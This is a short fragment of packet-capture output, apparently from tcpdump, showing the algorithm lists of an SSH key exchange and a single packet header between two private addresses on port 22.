..d…D….g..-P..F…….. ..*3.3…p.V#.$……ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1…#ssh-rsa,ssh-dss,ecdsa-sha2-nistp256….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….none,zlib@openssh.com….none,zlib@openssh.com………………….
2018-10-14 12:54:51.839985 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1133:1213, ack 1024, win 252, length 80
E..x#.@…..
..d
..d.D..g..-..”.P….R…..L…..A……E……E0